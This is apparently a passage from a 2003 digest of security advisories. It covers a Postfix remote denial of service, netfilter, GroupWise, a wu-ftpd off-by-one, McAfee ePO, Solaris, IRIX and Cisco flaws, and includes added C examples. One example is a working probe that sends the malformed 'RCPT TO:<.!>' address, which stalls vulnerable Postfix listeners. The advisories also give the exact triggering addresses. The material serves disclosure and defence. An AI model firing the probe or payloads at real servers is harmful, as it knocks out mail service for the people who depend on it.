drweb_sendmail-4.29.10a
edonkey-gui-gtk-0.5.0
enca-0.10.7
epic4-1.0.1_2
evolution-1.2.2_1
exim-3.36_1
exim-4.12_5
exim-ldap-4.12_5
exim-ldap2-4.12_5
exim-mysql-4.12_5
exim-postgresql-4.12_5
fam-2.6.9_2
fastdep-0.15
feh-1.2.4_1
ferite-0.99.6
fileutils-4.1_1
finfo-0.1
firebird-1.0.2
firebird-1.0.r2
frontpage-5.0.2.2623_1
galeon-1.2.8
galeon2-1.3.2_1
gdb-5.3_20030311
gdb-5.2.1_1
gdm2-2.4.1.3
gecc-20021119
gentoo-0.11.34
gkrellmvolume-2.1.7
gltron-0.61
global-4.5.1
gnat-3.15p
gnomelibs-1.4.2_1
gprolog-1.2.16
gracula-3.0
gringotts-1.2.3
gtranslator-0.43_1
gvd-1.2.5
hercules-2.16.5
hte-0.7.0
hugs98-200211
i386-rtems-gdb-5.2_1
i960-rtems-gdb-5.2_1
installwatch-0.5.6
ivtools-1.0.6
ja-epic4-1.0.1_2
ja-gnomelibs-1.4.2_1
ja-msdosfs-20001027
ja-samba-2.2.7a.j1.1_1
kdebase-3.1_1
kdelibs-3.1
kermit-8.0.206
ko-BitchX-1.0c16_3
ko-msdosfs-20001027
leocad-0.73
libfpx-1.2.0.4_1
libgnomeui-2.2.0.1
libpdel-0.3.4
librep-0.16.1_1
linux-beonex-0.8.1
linux-divxplayer-0.2.0
linux-edonkey-gui-gtk-0.2.0.a.2002.02.22
linux-gnomelibs-1.2.8_2
linux-mozilla-1.2
linux-netscape-communicator-4.8
linux-netscape-navigator-4.8
linux-phoenix-0.3
linux_base-6.1_4
linux_base-7.1_2
lsh-1.5.1
lukemftpd-1.1_1
m68k-rtems-gdb-5.2_1
mips-rtems-gdb-5.2_1
mod_php4-4.3.1
moscow_ml-2.00_1
mozilla-1.0.2_1
mozilla-1.2.1_1,2
mozilla-1.2.1_2
mozilla-1.3b,1
mozilla-1.3b
mozilla-embedded-1.0.2_1
mozilla-embedded-1.2.1_1,2
mozilla-embedded-1.3b,1
msyslog-1.08f_1
netraider-0.0.2
openag-1.1.1_1
openssh-portable-3.5p1_1
openssh-3.5
p5-PPerl-0.23
paragui-1.0.2_2
powerpc-rtems-gdb-5.2_1
psim-freebsd-5.2.1
ptypes-1.7.4
pure-ftpd-1.0.14
qiv-1.8
readlink-20010616
reed-5.4
rox-1.3.6_1
rox-session-0.1.18_1
rpl-1.4.0
rpm-3.0.6_6
samba-2.2.8
samba-3.0a20
scrollkeeper-0.3.11_8,1
sh-rtems-gdb-5.2_1
sharity-light-1.2_1
siag-3.4.10
skipstone-0.8.3
sparc-rtems-gdb-5.2_1
squeak-2.7
squeak-3.2
swarm-2.1.1
tcl-8.2.3_2
tcl-8.3.5
tcl-8.4.1,1
tcl-thread-8.1.b1
teTeX-2.0.2_1
wine-2003.02.19
wml-2.0.8
worker-2.7.0
xbubble-0.2
xerces-c2-2.1.0_1
xerces_c-1.7.0
xnview-1.50
xscreensaver-gnome-4.08
xscreensaver-4.08
xworld-2.0
yencode-0.46_1
zh-cle_base-0.9p1
zh-tcl-8.3.0
zh-tw-BitchX-1.0c19_3
zh-ve-1.0
zh-xemacs-20.4_1

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch.asc



Postfix 1.1.12 remote DoS

2003-08-03

Risk level: high

Type: Remote DoS

Source of info: Michal Zalewski

Impact

There is a remotely exploitable denial of service vulnerability in Postfix
up to and including 1.1.12. The vulnerability does not affect the most
current version, 2.0, because of a major overhaul of the address parsing
code. Releases prior to 1.1.9 are not vulnerable by default, but become
exposed if append_dot_mydomain is turned off in the configuration file.

Overview

Recent 1.1 releases, having no publicly disclosed security problems, are
still commonly used and shipped in several popular Linux distributions,
including Red Hat 9 or Debian 3.0 (woody) - those distributions both ship
1.1.11.

The vulnerability lies in the address parser code. By supplying a remote
SMTP listener with a malformed envelope address, it is possible to,
depending on the method, either:

  - Cause the queue manager, nqmgr, to lock up permanently, effectively
    stopping any queue processing, so all mail traffic is suppressed.
    Restarting the service has no effect; a specific entry has to be
    removed from the queue to fix the problem. For that reason, a built-in
    watchdog that restarts nqmgr after a period of unresponsive behaviour
    cannot recover from this condition either.

    The attack can be performed by forcing the service to queue a mail
    to an address that would generate a bounce - depending on the
    configuration, it can be <nonexistent@local-server-name>, or, if user
    names are being checked, <nonexistent@[127.0.0.1]>. The "mail from" or
    "Errors-To" address should be set to "<.!>" or
    "<.!@local-server-name>". An attempt to parse and rewrite the latter
    address when preparing a bounce will lock up the service.

...or...

  - Lock up a single instance of the smtp listener in an unusable state
    that persists after the client disconnects. By repeating this,
    it is possible to DoS the service (or the entire system, depending
    on the configuration) very effectively.

    This can be achieved by providing any valid "MAIL FROM" in a SMTP
    conversation, and then supplying a "RCPT TO" similar to "MAIL FROM"
    in the previous example. If the server is vulnerable, the session
    should freeze at this point.

The latter approach, since it only creates a single stalled process, is a
less intrusive method of testing your systems for this issue remotely.

The attack can be detected by looking for "resolve_clnt_query: null
recipient" in your maillog. It is then necessary to find the problematic
entry in the queue and remove it manually, then restart the service.

It should be noted that it is often possible to attack instances that do
not have port 25 reachable from the Internet - envelope addresses and
certain headers such as Errors-To may very well be preserved when a
message is relayed via another system or service.
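The remote test the advisory outlines, as an added example that is neither from the advisory nor Postfix code: a small SMTP state machine that sends HELO, a valid MAIL FROM and then RCPT TO:<.!>, and treats a read timeout at that point as the stall. It can be driven by canned replies for offline checking or by a real socket; the HELO name, sender address, 20 second timeout and the canned reply sequences are this example's assumptions.

```c
/*
 * Added example, not part of the advisory or of Postfix. It implements the
 * remote check described above as a small SMTP state machine: HELO, a valid
 * MAIL FROM, then "RCPT TO:<.!>". A read timeout right after that RCPT is the
 * "session freezes" symptom; any reply at all means the server did not stall.
 * HELO name, sender, timeout and canned replies are this example's assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

enum probe_state  { ST_BANNER, ST_HELO, ST_MAIL, ST_RCPT, ST_DONE };
enum probe_result { PR_CONTINUE, PR_STALLED, PR_RESPONDED, PR_REFUSED };

/* Feed one server reply (NULL = the read timed out or the peer closed).
 * Sets *cmd to the next line to send (NULL when nothing more) and returns
 * the verdict so far. */
enum probe_result probe_step(enum probe_state *st, const char *reply, const char **cmd)
{
    *cmd = NULL;
    if (reply == NULL)                    /* no answer */
        return *st == ST_RCPT ? PR_STALLED : PR_REFUSED;
    if (*st == ST_RCPT) {                 /* it answered the poisoned RCPT */
        *cmd = "QUIT\r\n";
        *st = ST_DONE;
        return PR_RESPONDED;
    }
    if (reply[0] != '2') {                /* anything but 2xx: give up */
        *st = ST_DONE;
        return PR_REFUSED;
    }
    switch (*st) {
    case ST_BANNER: *cmd = "HELO probe.example.invalid\r\n";        *st = ST_HELO; break;
    case ST_HELO:   *cmd = "MAIL FROM:<probe@example.invalid>\r\n"; *st = ST_MAIL; break;
    case ST_MAIL:   *cmd = "RCPT TO:<.!>\r\n";                      *st = ST_RCPT; break;
    default:        *st = ST_DONE; break;
    }
    return PR_CONTINUE;
}

/* Constructed reply sequences (NULL = timeout) for offline checks. */
const char *const REPLIES_STALLED[]   = { "220 mx ESMTP Postfix", "250 mx", "250 Ok", NULL };
const char *const REPLIES_RESPONDED[] = { "220 mx ESMTP Postfix", "250 mx", "250 Ok", "250 Ok", NULL };
const char *const REPLIES_REFUSED[]   = { "220 mx ESMTP Postfix", "554 denied", NULL };

/* Drive the machine with canned replies; the array must end with NULL. */
enum probe_result probe_offline(const char *const *replies)
{
    enum probe_state st = ST_BANNER;
    const char *cmd;
    enum probe_result r;
    for (size_t i = 0; ; i++) {
        r = probe_step(&st, replies[i], &cmd);
        if (r != PR_CONTINUE || replies[i] == NULL)
            break;
    }
    return r;
}

/* One recv() per reply: fine for single-line replies, which is why HELO
 * rather than EHLO is used above. Returns NULL on timeout or close. */
static const char *recv_line(int fd, char *buf, size_t n)
{
    ssize_t got = recv(fd, buf, n - 1, 0);
    if (got <= 0)
        return NULL;
    buf[got] = '\0';
    return buf;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <ipv4-address> <port>\n", argv[0]);
        return 2;
    }
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons((unsigned short)atoi(argv[2]));
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct timeval tv = { 20, 0 };                    /* assumed 20 s read timeout */
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    if (inet_pton(AF_INET, argv[1], &sa.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) {
        perror("connect");
        return 2;
    }
    enum probe_state st = ST_BANNER;
    enum probe_result r;
    const char *cmd;
    char buf[512];
    do {
        r = probe_step(&st, recv_line(fd, buf, sizeof buf), &cmd);
        if (cmd != NULL && send(fd, cmd, strlen(cmd), 0) < 0)
            break;
    } while (r == PR_CONTINUE);
    close(fd);
    puts(r == PR_STALLED ? "stalled after RCPT TO:<.!>: matches the advisory"
       : r == PR_RESPONDED ? "server answered the RCPT: not stalled"
       : "refused or no answer before the RCPT stage");
    return r == PR_STALLED ? 1 : 0;
}
```

Run it as ./probe <ipv4> 25 only against a host you are authorised to test: as the advisory says, a stalled listener stays stalled after you disconnect, so each positive result consumes one smtpd process on the target.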


Patches

ftp://ftp.cgs.pl/pub/mirror/postfix/postfix-release/official/postfix-1.1-patch13.gz



Remote user may be able to DoS a machine with netfilter connection tracking

2003-08-02

Risk level: high

Type: Remote DoS

Source of info: Netfilter Core Team

Impact

Any remote user may be able to DoS a machine with netfilter connection
tracking when it is running a specific version of the Linux kernel (2.4.20).

Overview

The 2.4.20 kernel introduced a change in the behaviour of the generic
linked list support. The connection tracking core relied on the old
behaviour to identify 'UNCONFIRMED' connections.

'UNCONFIRMED' means traffic has been seen in only one direction, not yet
in the other. Since connection tracking could no longer identify such
connections correctly, they were assigned a very high timeout, which is
what makes the remote DoS possible.

The patch linked under Patches changes the connection tracking core to no
longer rely on any specific behaviour of the Linux linked list API.

Patches

http://www.netfilter.org/security/2003-08-01-listadd.html
or upgrade linux kernel to >=  2.4.21



A remote user may be able to crash a machine doing Network Address Translation (NAT).

2003-08-02

Risk level: medium

Type: DoS

Source of info: Netfilter Core Team

Impact

Under limited circumstances, a remote user may be able to crash a
machine doing Network Address Translation (NAT).

Overview

Affected systems are Linux systems running kernel 2.4.20 or a recent 2.5
kernel with CONFIG_IP_NF_NAT_FTP or CONFIG_IP_NF_NAT_IRC enabled (or the
ip_nat_ftp or ip_nat_irc modules loaded), on which FTP and IRC users are not
packet filtered out.

Solution:
Upgrade to Linux kernel 2.4.21 (stable), or apply the patch. As a
workaround, the modules can be removed, or iptables can be used to block
untrusted users from initiating FTP or IRC connections through the NAT
machine.

Patches

http://www.netfilter.org/security/2003-08-01-nat-sack.html



Novell GroupWise 6.5 Clear Text Vulnerability

2003-08-01

Risk level: medium

Type: Information leakage

Source of info: Novacoast

Impact

Novacoast has discovered a vulnerability in the Novell GroupWise 6.5 Wireless Webaccess logging functionality. The software exposes all username and passwords within the log file in clear text.  This information could be used to impersonate other users and allow unauthorized access to mail or network resources.

Overview

A key component of the Novell Nterprise family of one Net solutions, Novell GroupWise 6.5 is a cross-platform collaboration product that enables you to work smarter alone and with others over any type of network, wired or wireless, including the Internet. In addition to integrated e-mail and scheduling services, GroupWise offers task-, contact- and document-management services that increase productivity. GroupWise also delivers secure instant messaging, tools that help you manage daily activities more efficiently and extensive mobile-access capabilities. In a nutshell, this innovative, open standards-based approach to collaboration services provides security, control and mobility while increasing user productivity and reducing the cost of managing and maintaining your organization's essential communication and collaboration services.

Affected Version:
Novell GroupWise 6.5 Webaccess
Novell GroupWise Wireless Web Access
Novell Linux/Mac Beta Client
NetWare 5/6
Apache 1.3.x

Exploit:
None required. Open sys:\apache\logs\access_log: the credentials are logged
as part of the request URL, in the form username=****&password=****.

Recommended Solution:
Upgrade to Novell GroupWise 6.5 sp1
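The log exposure as an added example, not Novell's or Novacoast's code: a scanner for Apache access_log lines that flags requests carrying username= and password= in the query string and masks the password value so the log can be kept or shared. The log lines, the /servlet/webacc path and the function names are constructed for the example; only the query string of the request line is parsed, and only a parameter whose whole name is "password" is masked.

```c
/*
 * Added example, not Novell's or Novacoast's code. It scans Apache access_log
 * lines for requests that carry credentials in the query string, as the
 * advisory describes (username=...&password=...), and masks the password so
 * the log can be kept or shared. The log lines and the webacc path are
 * constructed for this example.
 */
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Constructed Common Log Format lines, not real GroupWise traffic. */
const char *const ACCESS_LOG[] = {
    "10.1.2.3 - - [01/Aug/2003:09:14:02 -0700] \"GET /servlet/webacc?username=alice&password=s3cret&action=login HTTP/1.1\" 200 512",
    "10.1.2.9 - - [01/Aug/2003:09:14:07 -0700] \"GET /servlet/webacc?action=inbox HTTP/1.1\" 200 2048",
    "10.1.2.3 - - [01/Aug/2003:09:15:30 -0700] \"GET /servlet/webacc?oldpassword=x&password=hunter2 HTTP/1.1\" 200 512",
    NULL
};

static int out_append(char *out, size_t *pos, size_t outsz, const char *s, size_t n)
{
    if (*pos + n >= outsz)
        return -1;                       /* would not fit with the NUL */
    memcpy(out + *pos, s, n);
    *pos += n;
    out[*pos] = '\0';
    return 0;
}

/* Copy `in` to `out`, replacing the value of every password= parameter in
 * the query string with "****". Returns the number of values masked, or -1
 * if `out` is too small. */
int mask_password_params(const char *in, char *out, size_t outsz)
{
    size_t pos = 0;
    int masked = 0;
    const char *q = strchr(in, '?');                     /* query string start */
    const char *end = q ? strpbrk(q, " \"") : NULL;     /* ends at space or quote */
    if (q == NULL || end == NULL)
        return out_append(out, &pos, outsz, in, strlen(in)) ? -1 : 0;
    if (out_append(out, &pos, outsz, in, (size_t)(q + 1 - in)))
        return -1;
    for (const char *p = q + 1; p < end; ) {
        const char *amp = memchr(p, '&', (size_t)(end - p));
        const char *pend = amp ? amp : end;              /* end of this parameter */
        const char *eq = memchr(p, '=', (size_t)(pend - p));
        if (eq && eq - p == 8 && strncasecmp(p, "password", 8) == 0) {
            if (out_append(out, &pos, outsz, "password=****", 13))
                return -1;
            masked++;
        } else if (out_append(out, &pos, outsz, p, (size_t)(pend - p))) {
            return -1;
        }
        if (amp && out_append(out, &pos, outsz, "&", 1))
            return -1;
        p = pend + 1;
    }
    return out_append(out, &pos, outsz, end, strlen(end)) ? -1 : masked;
}

/* Masks into a static buffer and returns it (NULL if the line is too long). */
const char *masked_copy(const char *in)
{
    static char out[2048];
    return mask_password_params(in, out, sizeof out) < 0 ? NULL : out;
}

/* Number of lines in a NULL-terminated list that carried a password value. */
int count_credential_lines(const char *const *lines)
{
    char out[2048];
    int n = 0;
    for (size_t i = 0; lines[i] != NULL; i++)
        if (mask_password_params(lines[i], out, sizeof out) > 0)
            n++;
    return n;
}

int main(void)
{
    for (size_t i = 0; ACCESS_LOG[i] != NULL; i++)
        puts(masked_copy(ACCESS_LOG[i]));
    printf("%d lines leaked a password\n", count_credential_lines(ACCESS_LOG));
    return 0;
}
```

Masking the existing log is a containment step only; the fix is the SP1 upgrade below, since a GET query string also ends up in proxy logs and browser history on the way to the server.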

Patches

http://support.novell.com 



Wu-ftpd fb_realpath() off-by-one bug

2003-07-31

Risk level: high

Type: Buffer overflow

Source of info: iSEC

Impact

The Wu-ftpd FTP server contains a remotely exploitable off-by-one bug. A
local or remote attacker could exploit this vulnerability to execute
arbitrary code and gain root privileges on a vulnerable system.

Overview

Janusz Niewiadomski and Wojciech Purczynski of iSEC Security Research have
found an off-by-one bug in the fb_realpath() function. An overflow occurs
when the constructed path, including its terminating NUL, is MAXPATHLEN+1
bytes long while the buffer is only MAXPATHLEN bytes in size. The
overflowed buffer lies on the stack.

The bug results from misuse of the rootd variable in the calculation of the
length of the concatenated string:

------8<------cut-here------8<------
    /*
     * Join the two strings together, ensuring that the right thing
     * happens if the last component is empty, or the dirname is root.
     */
    if (resolved[0] == '/' && resolved[1] == '\0')
        rootd = 1;
    else
        rootd = 0;

    if (*wbuf) {
        /* bug: rootd is added here, but the "/" is only appended when rootd == 0 */
        if (strlen(resolved) + strlen(wbuf) + rootd + 1 > MAXPATHLEN) {
            errno = ENAMETOOLONG;
            goto err1;
        }
        if (rootd == 0)
            (void) strcat(resolved, "/");
        (void) strcat(resolved, wbuf);
    }
------8<------cut-here------8<------

Since the path is constructed from the current working directory and a
file name given as a parameter to various FTP commands, the attacker needs
to create a deep directory structure.

Following FTP commands may be used to cause buffer overflow:

	STOR
	RETR
	APPE
	DELE
	MKD
	RMD
	STOU
	RNTO

This bug may be non-exploitable if the size of the buffer is greater than
MAXPATHLEN characters. This may occur, for example, if wu-ftpd is compiled
against some versions of the Linux kernel headers where PATH_MAX (and
therefore MAXPATHLEN) is defined to be exactly 4095 characters. In such
cases the buffer is padded with an extra byte because of variable alignment
resulting from code optimization, and the one-byte overflow lands in the
padding.

Linux 2.2.x and some early 2.4.x kernel versions define PATH_MAX to be
4095 characters, so only wu-ftpd binaries compiled on 2.0.x or later 2.4.x
kernels are affected.
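The off-by-one itself, as an added example that is not wu-ftpd's or FreeBSD's code: it reproduces the join step shared by FreeBSD realpath(3) (the entry dated 2003-08-04 above) and the fb_realpath() fragment quoted here, with a 16-byte MAXPATHLEN so the failing case can be shown, and a canary byte after the buffer to catch the NUL. JOIN_MAXPATHLEN, path_buf, join_component and join_outcome are names chosen for the example.

```c
/*
 * Added example, not wu-ftpd or FreeBSD code. It reproduces the final join
 * step shared by FreeBSD realpath(3) and wu-ftpd fb_realpath() with a small
 * MAXPATHLEN so the off-by-one is visible: the original length test adds
 * `rootd`, but the "/" separator is appended when rootd == 0, so the bound
 * is one byte too loose off the root directory (and one byte too strict at
 * it). A canary byte after the buffer shows the NUL that lands past the end.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define JOIN_MAXPATHLEN 16
#define CANARY 0x7f

/* resolved[0..JOIN_MAXPATHLEN-1] is the caller's buffer; the extra byte at
 * index JOIN_MAXPATHLEN is a canary the real caller would not own. */
typedef struct { char resolved[JOIN_MAXPATHLEN + 1]; } path_buf;

static void path_init(path_buf *pb, const char *dir)
{
    memset(pb->resolved, 0, sizeof pb->resolved);
    strncpy(pb->resolved, dir, JOIN_MAXPATHLEN - 1);
    pb->resolved[JOIN_MAXPATHLEN] = CANARY;
}

/* fixed == 0 reproduces the published test (+ rootd); fixed != 0 counts the
 * separator that is actually appended (+ !rootd). Returns -1 on ENAMETOOLONG. */
static int join_component(path_buf *pb, const char *wbuf, int fixed)
{
    int rootd = (pb->resolved[0] == '/' && pb->resolved[1] == '\0');
    int sep = fixed ? !rootd : rootd;
    if (*wbuf) {
        if (strlen(pb->resolved) + strlen(wbuf) + sep + 1 > JOIN_MAXPATHLEN) {
            errno = ENAMETOOLONG;
            return -1;
        }
        if (rootd == 0)
            strcat(pb->resolved, "/");
        strcat(pb->resolved, wbuf);
    }
    return 0;
}

/* 0 = rejected as too long, 1 = accepted and in bounds,
 * 2 = accepted but the terminating NUL overwrote the canary. */
int join_outcome(const char *dir, const char *leaf, int fixed)
{
    path_buf pb;
    path_init(&pb, dir);
    if (join_component(&pb, leaf, fixed) != 0)
        return 0;
    return pb.resolved[JOIN_MAXPATHLEN] == CANARY ? 1 : 2;
}

int main(void)
{
    /* 12-character directory plus "/" and a 3-character name: 16 characters,
     * the limit, so the NUL goes one byte past the buffer with the old test */
    printf("deep path   original test: %d   fixed test: %d\n",
           join_outcome("/a/b/c/d/e/f", "ghi", 0), join_outcome("/a/b/c/d/e/f", "ghi", 1));
    /* at the root no separator is added, yet the original test charges for one */
    printf("root path   original test: %d   fixed test: %d\n",
           join_outcome("/", "abcdefghijklmn", 0), join_outcome("/", "abcdefghijklmn", 1));
    return 0;
}
```

The deep-path case is the one the advisories describe: the old test accepts a 16-character result and the terminator lands on the canary, while the corrected accounting rejects it with ENAMETOOLONG; the root case shows the same rootd confusion from the other side.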

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/wu-ftpd-2.6.2-11.71.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.2-11.71.1.i386.rpm

Red Hat Linux 7.1 for iSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/iSeries/SRPMS/wu-ftpd-2.6.2-11.71.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/iSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm

Red Hat Linux 7.1 for pSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/pSeries/SRPMS/wu-ftpd-2.6.2-11.71.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/pSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/wu-ftpd-2.6.2-11.72.1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.2-11.72.1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/wu-ftpd-2.6.2-11.72.1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/wu-ftpd-2.6.2-11.73.1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/wu-ftpd-2.6.2-11.73.1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/wu-ftpd-2.6.2-12.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/wu-ftpd-2.6.2-12.i386.rpm

Mandrake
http://www.mandrakesecure.net/en/ftp.php



Multiple vulnerabilities in McAfee ePolicy Orchestrator 2.X and 3.0

2003-07-31

Risk level: high

Type: many types

Source of info: @stake, Inc.

Impact

Three vulnerabilities exist in the ePolicy Server and Agent that allow an
attacker to anonymously execute arbitrary code. To attack a machine running
ePO, an attacker would typically need to be located inside the corporate
firewall and be able to connect over the network to the host they wish to
compromise. Once one of the vulnerabilities is successfully exploited, the
attacker can execute arbitrary code under the privileges used by ePO;
SYSTEM is the default.

Overview

McAfee Security ePolicy Orchestrator
(http://www.mcafeeb2b.com/products/epolicy/default-desktop-protection.asp)
is an enterprise antivirus management tool. ePolicy Orchestrator is a
policy driven deployment and reporting tool for enterprise administrators
to effectively manage their desktop and server antivirus products.

The ePolicy Orchestrator (ePO) is built upon a client / server solution
with Agents running on all client hosts. This allows all installation and
administration of antivirus software to be centralized on one host. To
achieve this, ePO relies on three parts: Server, Agents and MSDE (to store
configuration information). All services are by default installed to run as
SYSTEM on the host and thus can be used to either elevate local privileges
or remotely compromise the host.

@stake has discovered 3 different vulnerabilities in the ePO solution: 2
vulnerabilities concern the server and 1 concerns the agent.

Server Issue #1

MSDE SA account compromise - This vulnerability applies to ePO 2.X
and 3.0 and is divided up into 3 different parts, that combined
allows an attacker to execute code on the host.

Information disclosure - By issuing a properly formatted HTTP
request to the ePO Server, it will respond with the server config
file. This config file contains username and encrypted password
for the database administrator of the MSDE installation.

Weak cryptography implementation - The encrypted password stored
in the ePO Server config file is encrypted with a DES variant and a
secret key. The secret key is stored in a dll, making decryption of
the password an easy task.

Default MSDE installation - The installation of MSDE is not
hardened, so once the attacker has the database administrator
username and password, he can execute OS commands as SYSTEM
through xp_cmdshell.

Server Issue #2

ComputerList format string vulnerability - This vulnerability
applies to ePO 2.X. Sending a POST request to the Server where the
ComputerList parameter contains a few format characters will cause
the service to crash when it tries to log a failed name resolution.
A properly constructed malicious string containing format string
characters will allow the execution of arbitrary code.

Client Issue #1

ePO Agent Heap Overflow - This vulnerability applies to ePO 2.X.
Sending a POST request to the Agent where parameters on the URL are
substituted by a large number of A's will cause the service to
crash. A properly formatted request will allow an attacker to
overwrite arbitrary data and thus execute code.

Patches

http://www.networkassociates.com/us/downloads/updates/hotfixes.asp



Buffer Overflow in Sun Solaris Runtime Linker

2003-07-29

Risk level: high

Type: Buffer overflow

Source of info: iDEFENSE Labs

Impact

A locally exploitable buffer overflow exists in the ld.so.1 dynamic runtime
linker in Sun's Solaris operating system. The LD_PRELOAD variable can be
passed a large value, which will cause the runtime linker to overflow a
stack based buffer. The overflow occurs on a non-executable stack, making
command execution more difficult than normal, but not impossible.

Overview

iDEFENSE has proof of concept exploit code allowing local attackers to
gain root privileges by exploiting the /usr/bin/passwd command on
Solaris 9. A "return to libc" method is utilized to circumvent the
safeguards of the non-executable stack. It is feasible for a local
attacker to exploit this vulnerability to gain root privileges if at
least one setuid root dynamically linked program exists on the system.
Virtually all default implementations of Solaris 8 and 9 fulfill this
criterion.

The following operating system configurations are vulnerable:

SPARC Platform
     * Solaris 2.6 with patch 107733-10 and without patch 107733-11
     * Solaris 7 with patches 106950-14 through 106950-22 and without
       patch 106950-23
     * Solaris 8 with patches 109147-07 through 109147-24 and without
       patch 109147-25
     * Solaris 9 without patch 112963-09

   x86 Platform
     * Solaris 2.6 with patch 107734-10 and without patch 107734-11
     * Solaris 7 with patches 106951-14 through 106951-22 and without
       patch 106951-23
     * Solaris 8 with patches 109148-07 through 109148-24 and without
       patch 109148-25
     * Solaris 9 without patch 113986-05

Patches

http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/55680



IRIX nsd server and modules mishandle AUTH_UNIX gid list

2003-07-29

Risk level: high

Type: remote system compromise

Source of info: SGI Security Team

Impact

It's been reported by LSD (http://www.lsd-pl.net/irx_nsd.html) that the IRIX name services daemon "nsd" can be exploited
in various ways through the AUTH_UNIX gid list.  This could result in an
attacker gaining root access.


Overview

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in future releases of IRIX.

The /usr/etc/nsd binary is installed by default on IRIX 6.5 systems as part
of eoe.sw.base.

There is no practical workaround available for these problems.  SGI has
provided a series of patches for these vulnerabilities; the recommendation
is to upgrade to IRIX 6.5.22 when available, or to install the appropriate
patch from the table below.

   OS Version     Vulnerable?     Patch #     Notes
   ----------     -----------     -------     -----
   IRIX 3.x        unknown                     Note 1
   IRIX 4.x        unknown                     Note 1
   IRIX 5.x        unknown                     Note 1
   IRIX 6.0.x      unknown                     Note 1
   IRIX 6.1        unknown                     Note 1
   IRIX 6.2        unknown                     Note 1
   IRIX 6.3        unknown                     Note 1
   IRIX 6.4        unknown                     Note 1
   IRIX 6.5          yes                       Notes 2 & 3
   IRIX 6.5.1        yes                       Notes 2 & 3
   IRIX 6.5.2        yes                       Notes 2 & 3
   IRIX 6.5.3        yes                       Notes 2 & 3
   IRIX 6.5.4        yes                       Notes 2 & 3
   IRIX 6.5.5        yes                       Notes 2 & 3
   IRIX 6.5.6        yes                       Notes 2 & 3
   IRIX 6.5.7        yes                       Notes 2 & 3
   IRIX 6.5.8        yes                       Notes 2 & 3
   IRIX 6.5.9        yes                       Notes 2 & 3
   IRIX 6.5.10       yes                       Notes 2 & 3
   IRIX 6.5.11       yes                       Notes 2 & 3
   IRIX 6.5.12       yes                       Notes 2 & 3
   IRIX 6.5.13       yes                       Notes 2 & 3
   IRIX 6.5.14       yes                       Notes 2 & 3
   IRIX 6.5.15       yes                       Notes 2 & 3
   IRIX 6.5.16       yes                       Notes 2 & 3
   IRIX 6.5.17m      yes            5189       Notes 2 & 4
   IRIX 6.5.17f      yes            5190       Notes 2 & 4
   IRIX 6.5.18m      yes            5191       Notes 2 & 4
   IRIX 6.5.18f      yes            5192       Notes 2 & 4
   IRIX 6.5.19m      yes            5193       Notes 2 & 4
   IRIX 6.5.19f      yes            5194       Notes 2 & 4
   IRIX 6.5.20m      yes            5195       Notes 2 & 4
   IRIX 6.5.20f      yes            5196       Notes 2 & 4
   IRIX 6.5.21m      yes            5197       Notes 2 & 4
   IRIX 6.5.21f      yes            5197       Notes 2 & 4


NOTES:

     1) This version of the IRIX operating system has been retired. Upgrade
        to an actively supported IRIX operating system.  See
        http://support.sgi.com for more information.

     2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
        SGI Support Provider or URL: http://support.sgi.com

     3) Upgrade to IRIX 6.5.22 when available.

     4) Install the patch or upgrade to IRIX 6.5.22 when available.

Patches

http://www.sgi.com/support/security/
ftp://patches.sgi.com/support/free/security/patches/
http://support.sgi.com/ 
ftp://patches.sgi.com/



HTTP GET Vulnerability in Cisco AP1x00

2003-07-28

Risk level: medium

Type: DoS

Source of info: Cisco Systems

Impact

A vulnerability has been reported by an external researcher in the Cisco IOS(R) release for Cisco Aironet AP1x00 Series wireless devices. It can cause the AP1x00 to reload, and repeated exploitation can lead to a prolonged Denial-of-Service (DoS) of the AP1x00. The vulnerability affects only IOS-based Cisco Aironet wireless products; the VxWorks-based Cisco Aironet wireless devices are not affected.

Overview

Sending a malformed URL to the Cisco Aironet AP1x00 can cause the device to reload.
Repeated exploitation of this vulnerability can lead to a prolonged Denial-of-Service (DoS) of the AP1x00.
The vulnerability is fixed in the 12.2(11)JA1 version of the software for all Cisco Aironet AP1x00 devices.
Only the following Cisco IOS-based wireless Access Points are affected:

   +------------------------------------------+
   |   Hardware Model   | Software Release(s) |
   |--------------------+---------------------|
   |Cisco Aironet       |12.2(4)JA,           |
   |Wireless Access     |12.2(4)JA1,          |
   |Point AP1100 series |12.2(8)JA, 12.2(11)JA|
